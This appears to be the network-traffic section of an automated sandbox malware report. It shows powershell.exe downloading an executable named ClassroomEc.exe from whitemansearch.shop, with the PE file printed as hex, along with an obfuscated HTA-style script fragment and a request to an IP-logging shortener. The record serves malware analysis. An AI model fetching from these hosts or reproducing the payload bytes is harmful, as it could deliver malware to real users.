                                                                                                                                                            Feb 20, 2024 23:45:58.322899103 CET1286INData Raw: 46 5a 50 5c 3e ac 11 87 a4 a6 70 00 9b dc 44 a1 23 0b 03 d9 aa 29 be e2 b2 27 2a d5 3e 66 2c 7b 59 99 8e 68 42 a4 6a fa 09 dd c1 f9 ae 7a 54 89 fc 04 ed ea d1 a6 25 1c 9b 6e a9 16 82 3c 49 3d 79 f4 a7 02 4d db 5f 7f a0 08 d0 cc 68 c5 33 38 d2 a0
                                                                                                                                                            Data Ascii: FZP\>pD#)'*>f,{YhBjzT%n<I=yM_h389xBsrSxR; nIY:qDb7IM8FzeejHp`8 ||>gs='yg}KPB'>;lwBy-|%
                                                                                                                                                            Feb 20, 2024 23:45:58.322921038 CET1286INData Raw: 6c b9 c0 24 36 39 2a e4 2c 40 73 30 55 66 dc a0 86 25 7b 33 60 70 85 75 a1 1d 14 84 20 6f 55 63 77 ca d3 95 11 8e 2a 54 51 9d 81 d4 28 c0 8d 3f a9 e0 a7 c4 c4 00 9d fc 33 4a 82 19 25 a5 c3 bc ea 0f b9 8b 93 47 8f f8 fa 26 e1 c2 ee b1 4d e1 8f d4
                                                                                                                                                            Data Ascii: l$69*,@s0Uf%{3`pu oUcw*TQ(?3J%G&M?w,a.aQQXoA_5)4(yXPjU{(PmbSX58eV\p^#;tA~_=R/xda5
                                                                                                                                                            Feb 20, 2024 23:45:58.322942019 CET1286INData Raw: 6e 98 81 57 3d f0 1f 21 ad 73 72 49 02 6f 23 0f 4f 34 b6 69 20 58 3b 7c 1a c5 79 95 72 7c fc ac 70 81 0f 6a 1d d8 34 aa 84 74 70 ee 35 14 d5 e4 3d 0a 72 d7 d2 74 35 16 5c 05 3d 77 76 89 ae 30 76 c5 d8 81 5f b9 f1 77 ff 0c e5 ac e7 4d 46 05 ef 94
                                                                                                                                                            Data Ascii: nW=!srIo#O4i X;|yr|pj4tp5=rt5\=wv0v_wMFXg%K3@wo;T/70G&P5eCNNlXb4P~'^>9m\osyiRk|& BoG|m%-d8pa)GRX
                                                                                                                                                            Feb 20, 2024 23:45:58.322963953 CET1286INData Raw: 20 10 2b d4 b6 c8 eb 5f 39 cd 1d 6d 31 fa 1e 46 a1 c7 46 63 16 d7 14 7f a8 c0 c3 15 81 31 07 a6 fe 6f 95 6e 2e ac 32 d2 c3 8a c6 ff da 81 6a 82 97 97 96 ac 5a d3 fc 48 fb ab 2c f5 04 d6 dd 08 c5 77 6f c2 64 b0 17 f4 94 73 a0 8c 10 14 a5 26 55 41
                                                                                                                                                            Data Ascii: +_9m1FFc1on.2jZH,wods&UA}[K*sMs=:b3o7Xli+DN=tVRB"iCe|zQ7Z-@s&LJ(FR~$wt/h-p4af0ao4K"_
                                                                                                                                                            Feb 20, 2024 23:45:58.322987080 CET1286INData Raw: d9 e1 27 44 23 62 18 fc e6 cd 05 a4 85 08 ea ba a7 99 30 d0 74 27 50 cf a8 e5 66 47 1d bd 34 5f a7 17 3b 7b f9 20 7a f6 bd 5e 64 48 fc 30 bf 86 24 b8 4e ff 55 14 0f b2 91 58 9c 3e fb d1 df 29 98 a6 fc 6e cd 6e c0 86 1f 39 12 15 c2 08 d3 77 25 e0
                                                                                                                                                            Data Ascii: 'D#b0t'PfG4_;{ z^dH0$NUX>)nn9w%"do5;;V3Q%zcifD>%Y|C&lmUa_">Ku2ci/DAX"_y:Y/1}n=":}d"Eh[Cy1${%u
                                                                                                                                                            Feb 20, 2024 23:45:58.323010921 CET1286INData Raw: 65 22 20 53 48 4f 57 49 4e 54 41 53 4b 42 41 52 20 3d 20 22 6e 6f 22 20 3e 03 b9 86 d1 77 13 d1 a1 c3 a9 cc 3b 34 f9 ca 49 71 d7 36 06 bf a5 b4 ce 4c 3b b1 c7 17 ec 29 2b 13 01 94 75 58 19 a4 87 18 73 3d 80 cd e9 32 a0 36 fb aa f3 e2 1e c5 5d 05
                                                                                                                                                            Data Ascii: e" SHOWINTASKBAR = "no" >w;4Iq6L;)+uXs=26]<a(2dUW2Kg4cB5I;6oh&f,;R20z!3OyoKV3-Ob5t@t5zQ)y^?p5EdNK.U^}lrJ^+!VBb
                                                                                                                                                            Feb 20, 2024 23:45:58.540712118 CET1286INData Raw: 65 2c 72 62 2c 72 62 2c 79 70 2c 6c 65 2c 72 62 2c 72 4b 2c 72 62 2c 6c 65 2c 72 62 2c 72 62 2c 50 54 2c 6c 65 2c 72 62 2c 77 6f 2c 72 4b 2c 6c 65 2c 72 62 2c 79 70 2c 72 62 2c 6c 65 2c 72 62 2c 72 4b 2c 72 62 2c 6c 65 2c 72 62 2c 49 7a 2c 50 54
                                                                                                                                                            Data Ascii: e,rb,rb,yp,le,rb,rK,rb,le,rb,rb,PT,le,rb,wo,rK,le,rb,yp,rb,le,rb,rK,rb,le,rb,Iz,PT,le,rb,yp,MY,le,rb,yp,QZ,le,rb,wo,rK,le,rb,yp,PT,le,rb,yp,Iz,le,rb,yp,QZ,le,rb,wo,PT,le,rb,dJ,yp,le,rb,yp,Iz,le,rb,wo,rK,le,rb,wo,MY,le,rb,rK,rb,le,rb,rb,PT,le,r


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            1192.168.2.5497195.101.153.86807488C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Feb 20, 2024 23:46:06.394058943 CET84OUTGET /ClassroomEc.exe HTTP/1.1
                                                                                                                                                            Host: whitemansearch.shop
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Feb 20, 2024 23:46:06.610214949 CET1286INHTTP/1.1 200 OK
                                                                                                                                                            Server: nginx-reuseport/1.21.1
                                                                                                                                                            Date: Tue, 20 Feb 2024 22:46:06 GMT
                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                            Content-Length: 1212711
                                                                                                                                                            Last-Modified: Tue, 20 Feb 2024 15:43:47 GMT
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            Keep-Alive: timeout=30
                                                                                                                                                            ETag: "65d4c8b3-128127"
                                                                                                                                                            Expires: Thu, 21 Mar 2024 22:46:06 GMT
                                                                                                                                                            Cache-Control: max-age=2592000
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Data Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 1f 00 94 82 5b 61 fa d1 5b 61 fa d1 5b 61 fa d1 52 19 7e d1 59 61 fa d1 52 19 6f d1 5c 61 fa d1 52 19 79 d1 4d 61 fa d1 52 19 69 d1 4a 61 fa d1 5b 61 fb d1 98 61 fa d1 34 17 64 d1 59 61 fa d1 34 17 50 d1 5f 61 fa d1 34 17 51 d1 6a 61 fa d1 34 17 60 d1 5a 61 fa d1 34 17 67 d1 5a 61 fa d1 52 69 63 68 5b 61 fa d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 b3 be 2e 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 7a 02 00 00 ba 00 00 00 00 00 00 f8 7b 02 00 00 10 00 00 00 90 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 03 00 00 04 00 00 f5 8d 12 00 03 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 b5 02 00 b4 00 00 00 00 00 03 00 51 40 00 00 00 00 00 00 00 00 00 00 3f 59 12 00 e8 27 00 00 00 50 03 00 38 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 02 00 fc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1f 78 02 00 00 10 00 00 00 7a 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6a 35 00 00 00 90 02 00 00 36 00 00 00 7e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 2b 00 00 00 d0 02 00 00 06 00 00 00 b4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 51 40 00 00 00 00 03 00 00 42 00 00 00 ba 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 15 00 00 00 50 03 00 00 16 00 00 00 fc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                            Data Ascii: MZ`@!L!Require Windows$[a[a[aR~YaRo\aRyMaRiJa[aa4dYa4P_a4Qja4`Za4gZaRich[aPEL.`z{@p@TQ@?Y'P8.textxz `.rdataj56~@@.data+@.rsrcQ@B@@.reloc`P@B
                                                                                                                                                            Feb 20, 2024 23:46:06.610327005 CET1286INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                            Data Ascii: UMMMMj$fE}tMEEEMUPMPhPfE}tM(E
                                                                                                                                                            Feb 20, 2024 23:46:06.610404015 CET1286INData Raw: 33 c0 8b e5 5d c2 0c 00 cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 0c 50 8b 4d 08 51 e8 10 00 00 00 83 c4 08 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a 10 8b 45 0c 50 8b 4d 08 51 e8 26 62 02 00 83 c4 0c f7 d8 1b c0 83 c0 01 5d c3 cc cc
                                                                                                                                                            Data Ascii: 3]UEPMQ]UjEPMQ&b]UQEHMUEBE]U8EBE8]MMUPXBEMQUPMQEUEP=URMM=
                                                                                                                                                            Feb 20, 2024 23:46:06.610467911 CET1286INData Raw: fc 83 c0 06 50 68 5c 94 42 00 e8 2d fd ff ff 83 c4 08 e9 b8 fd ff ff 68 b4 96 42 00 8b 4d fc 83 c1 02 51 e8 b4 1e 00 00 83 c4 08 f7 d8 1b c0 f7 d8 74 42 8b 55 fc 0f b7 42 06 83 f8 30 74 0c 8b 4d fc 0f b7 51 06 83 fa 31 75 25 8b 45 fc 0f b7 48 08
                                                                                                                                                            Data Ascii: Ph\B-hBMQtBUB0tMQ1u%EH wURh,B_;hBEPVt"MQ wjBs!hBEPt7MQ0|&EH9URB
                                                                                                                                                            Feb 20, 2024 23:46:06.610522985 CET1286INData Raw: 8b 55 0c 81 e2 00 00 01 00 75 0b 8b 45 b0 0d 00 01 00 00 89 45 b0 8d 4d f4 51 8b 55 08 52 e8 23 1a 00 00 83 c4 08 50 8d 4d e8 e8 77 fe ff ff 8d 4d f4 e8 2f ba 00 00 85 c0 75 1c c7 45 a8 01 00 00 00 8d 4d e8 e8 dc 2d 01 00 8d 4d f4 e8 d4 2d 01 00
                                                                                                                                                            Data Ascii: UuEEMQUR#PMwM/uEM-M-E{MEMEEPBt=MujURLBEPPBEM{-Ms-EEM_-MW-E]UEEE
                                                                                                                                                            Feb 20, 2024 23:46:06.610601902 CET1286INData Raw: 8d 4d f0 e8 98 f8 ff ff b8 01 00 00 00 85 c0 0f 84 da 00 00 00 8d 4d ec 51 8d 4d f0 e8 ff ee ff ff 50 e8 29 28 00 00 83 c4 08 89 45 fc 83 7d fc 00 75 74 8b 55 10 83 c2 02 89 55 10 8b 45 10 0f b7 08 83 f9 30 7c 0b 8b 55 10 0f b7 02 83 f8 39 7e 2c
                                                                                                                                                            Data Ascii: MMQMP)(E}utUUE0|U9~,Ma|Ez~UA|2MZ'EPMMRMEcHEPMQjUREPM/PMN(E\BMMME
                                                                                                                                                            Feb 20, 2024 23:46:06.610908985 CET1286INData Raw: 08 83 c0 2c 50 8d 4d d0 51 ff 15 24 90 42 00 eb 4a 8b 55 08 8b 45 c0 89 42 2c 8b 4d c4 89 4a 30 eb 39 6a 66 8b 55 08 8b 02 8b 4d 08 51 8b 50 1c ff d2 89 85 6c ff ff ff 8d 4d b8 e8 fa 09 00 00 8d 4d f4 e8 d2 23 01 00 8d 4d e0 e8 ea 09 00 00 8b 85
                                                                                                                                                            Data Ascii: ,PMQ$BJUEB,MJ09jfUMQPlMM#MlCEx4t~M P#u9jhMEPJhMMx#MhdMsMK#McdU,RM &
                                                                                                                                                            Feb 20, 2024 23:46:06.611223936 CET1286INData Raw: 00 74 71 8b 15 50 d4 42 00 89 55 f0 8b 45 f0 83 e8 01 89 45 f0 83 7d f0 69 77 3d 8b 4d f0 0f b6 91 ec 2e 40 00 ff 24 95 d8 2e 40 00 6a 11 6a 00 e8 0f 85 00 00 83 c4 08 eb 30 6a 12 6a 00 e8 01 85 00 00 83 c4 08 eb 22 6a 13 6a 00 e8 f3 84 00 00 83
                                                                                                                                                            Data Ascii: tqPBUEE}iw=M.@$.@jj0jj"jjPBPjj@E=@B=LBtMQLBR,Bt}t^E%=tMQj!j|6Uu=BtE%P B
                                                                                                                                                            Feb 20, 2024 23:46:06.611289024 CET1286INData Raw: ec 51 89 4d fc 33 c0 8b 4d fc 66 89 01 33 d2 8b 45 fc 66 89 50 02 8b 4d fc c7 41 08 00 00 00 00 8b 45 fc 8b e5 5d c3 cc cc cc cc cc cc cc 55 8b ec 51 89 4d fc 8b 4d fc e8 71 6d 01 00 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51
                                                                                                                                                            Data Ascii: QM3Mf3EfPMAE]UQMMqm]UQMEQM-]UQMEE]UQME@@MQURMd6]UQMEPM6]UE
                                                                                                                                                            Feb 20, 2024 23:46:06.611449957 CET1286INData Raw: c0 01 50 8d 4d ec e8 dd fd ff ff 50 8b 4d f8 83 c1 01 51 ff 15 44 90 42 00 8d 4d ec e8 97 fd ff ff 8d 4d ec e8 1f a1 00 00 89 45 fc c7 45 e8 00 00 00 00 eb 09 8b 55 e8 83 c2 01 89 55 e8 81 7d e8 ff 0f 00 00 7d 4d 8b 45 fc 83 c0 0f 50 8d 4d ec e8
                                                                                                                                                            Data Ascii: PMPMQDBMMEEUU}}MEPMEMQUREMARBM<MP@BuEPMM`E]UQEPXBEMQXB;E|$UREPMQPBuU
                                                                                                                                                            Feb 20, 2024 23:46:06.826312065 CET1286INData Raw: 00 00 75 0e 8b 4d 08 51 e8 55 ff ff ff 83 c4 04 eb 38 83 3d 88 d4 42 00 02 75 2a 8b 55 0c 52 8d 85 bc fd ff ff 50 ff 15 50 90 42 00 85 c0 7c 07 b8 01 00 00 00 eb 13 8b 4d 08 51 e8 22 ff ff ff 83 c4 04 eb 05 b8 01 00 00 00 8b e5 5d c3 cc cc cc cc
                                                                                                                                                            Data Ascii: uMQU8=Bu*URPPB|MQ"]UjEP\BuIHBE}tMQ B3.UR@BE}tEuMQ B3]UM2jjMPMP`BE}


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            0192.168.2.549712104.21.79.2294437832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-02-20 22:46:04 UTC655OUTGET /2ZrVm4 HTTP/1.1
                                                                                                                                                            Host: 2no.co
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                                            Sec-Fetch-User: ?1
                                                                                                                                                            Sec-Fetch-Dest: document
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            2024-02-20 22:46:05 UTC1184INHTTP/1.1 302 Found
                                                                                                                                                            Date: Tue, 20 Feb 2024 22:46:05 GMT
                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            location: http://www.google.com/
                                                                                                                                                            set-cookie: 528326243210798046=3; expires=Thu, 20 Feb 2025 22:46:05 GMT; Max-Age=31622400; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                                                            set-cookie: clhf03028ja=191.96.227.222; expires=Thu, 20 Feb 2025 22:46:05 GMT; Max-Age=31622400; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                                                            memory: 0.4245147705078125
                                                                                                                                                            expires: Tue, 20 Feb 2024 22:46:05 +0000
                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                            strict-transport-security: max-age=604800
                                                                                                                                                            strict-transport-security: max-age=31536000
                                                                                                                                                            content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Unrj68xTSXtd5FWcum7Rl4MlqL8VrQ0x7Pp6pqtIJiW65ijWtONA3I2IZdzFM3OVeHT1vDk%2Bmdq8hXvowquVvhXlG%2BkmHnAKdhh3Fc4iKdM9e0kBThn9tjA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 858a48986f4f0f67-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            2024-02-20 22:46:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                            Data Ascii: 0


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            1192.168.2.549714142.250.31.844437832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-02-20 22:46:04 UTC680OUTPOST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1
                                                                                                                                                            Host: accounts.google.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            Content-Length: 1
                                                                                                                                                            Origin: https://www.google.com
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4
                                                                                                                                                            2024-02-20 22:46:04 UTC1OUTData Raw: 20
                                                                                                                                                            Data Ascii:
                                                                                                                                                            2024-02-20 22:46:04 UTC1799INHTTP/1.1 200 OK
                                                                                                                                                            Content-Type: application/json; charset=utf-8
                                                                                                                                                            Access-Control-Allow-Origin: https://www.google.com
                                                                                                                                                            Access-Control-Allow-Credentials: true
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                            Date: Tue, 20 Feb 2024 22:46:04 GMT
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-p9XhJzbg8-2HIcQOC2fdUQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self'
                                                                                                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport/allowlist
                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport
                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                            reporting-endpoints: default="/_/IdentityListAccountsHttp/web-reports?context=eJzjMtDikmLw1JBiOHxtB5Meyy0mIyCe2_2UaSEQH4x7znQUiHf4eLA4pc9gDQJiIR6ONdevrGMTaPj6ahYzALhDF-Y"
                                                                                                                                                            Server: ESF
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Connection: close
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            2024-02-20 22:46:04 UTC23INData Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a
                                                                                                                                                            Data Ascii: 11["gaia.l.a.r",[]]
                                                                                                                                                            2024-02-20 22:46:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                            Data Ascii: 0


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            2192.168.2.549715142.251.40.2384437832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-02-20 22:46:04 UTC752OUTGET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1
                                                                                                                                                            Host: clients2.google.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            X-Goog-Update-Interactivity: fg
                                                                                                                                                            X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda
                                                                                                                                                            X-Goog-Update-Updater: chromecrx-117.0.5938.132
                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            2024-02-20 22:46:05 UTC732INHTTP/1.1 200 OK
                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-aTSkJAObXDuNZsHd9DhSig' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                            Date: Tue, 20 Feb 2024 22:46:04 GMT
                                                                                                                                                            Content-Type: text/xml; charset=UTF-8
                                                                                                                                                            X-Daynum: 6259
                                                                                                                                                            X-Daystart: 53164
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            Server: GSE
                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Connection: close
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            2024-02-20 22:46:05 UTC520INData Raw: 32 63 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 36 32 35 39 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 35 33 31 36 34 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22
                                                                                                                                                            Data Ascii: 2c9<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="6259" elapsed_seconds="53164"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
                                                                                                                                                            2024-02-20 22:46:05 UTC200INData Raw: 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69 7a 65 3d 22 32 34 38 35 33 31 22 20 73 74 61 74 75 73 3d 22 6f 6b 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 36 22 2f 3e 3c 2f 61 70 70 3e 3c 2f 67 75 70 64 61 74 65 3e 0d 0a
                                                                                                                                                            Data Ascii: 723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app></gupdate>
                                                                                                                                                            2024-02-20 22:46:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                            Data Ascii: 0


